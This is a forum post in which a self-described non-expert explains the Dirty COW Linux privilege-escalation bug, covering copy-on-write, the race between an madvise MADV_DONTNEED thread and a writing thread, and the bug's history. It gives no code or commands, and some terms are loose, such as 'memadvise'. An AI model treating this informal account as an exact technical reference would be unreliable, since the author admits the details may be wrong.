Another more thorough but less technical explanation is here.

So this was borderline over my head, but I think I understand it well enough to get the basics.

The Dirty Cow bug, as it's known, allows privilege escalation on Linux (meaning an untrusted program can modify files owned by root). "Cow" technically refers to COW, for copy on write, which is a way to more efficiently deal with multiple copies of memory. What happens is that if multiple processes want a given bit of data, the system creates a read-only instance of the memory that's visible to all of them rather than multiple copies of the same thing. Then if one of them needs to write to it, the kernel creates a copy that is writable and only available to that process. The "dirty" means that the bit of memory has been modified.

If I'm understanding the exploit correctly, it forces the kernel to remove a "I want write access to this memory" flag by creating what would otherwise be an infinite loop in a memory access routine (specifically one that tells the kernel that the memory is no longer needed). Once the kernel does this, some security is lessened since the operation is now seen as read-only (and thus less dangerous). Meanwhile, it creates a second thread that tries to access the memory directly; since the other thread has removed the flag (and thus the extra scrutiny), this second thread can then, in theory, write to the addressed space before the COW is made, thus writing to the actual file.

There are a couple interesting things about this. One is that the vulnerability has been known since probably 2007. But increases in hardware speed make it more possible; the proof of concept on the exploit tries each operation 100,000,000 times apiece in order for the proverbial lightning to strike. One contributor (quoted in the YouTube video I linked above) apparently tried to fix it in years ago, but it broke something on an IBM mainframe set-up so was reverted.

The other thing that was kind of interesting is that this also relies on Linux's screwy use of memadvise. Under the POSIX standard, it's supposed to do what it sounds like: advise the operating system about what certain blocks of memory are going to be doing.

One of the flags you can set for a given range of memory is MADV_DONTNEED. This is fairly self-explanatory: it tells the OS that the memory is unlikely to be needed in the future, but the nature of the memadvise routine is that it doesn't force the OS to do anything about it. In other words, it tells the OS that it may re-purpose the memory for something else, but doesn't have to.

Or at least that's how it's supposed to work. For some reason, when this command was brought into Linux, the "advice" part was thrown out. In Linux, the flag forces the OS to get rid of the underlying data. If you then try to reference it again, the system will either re-read the file from the hard disk or will return all 0's if it can't do that for whatever reason. It's unclear why this was done, and from this rant on the subject it appears that it was simply a misreading of how memadvise worked in Tru64, an old 64-bit UNIX implementation.

I hope this makes sense, and some of the more tech-savvy folks (Devac, mk, others) can hopefully tell me if I'm misstating anything.


posted 2521 days ago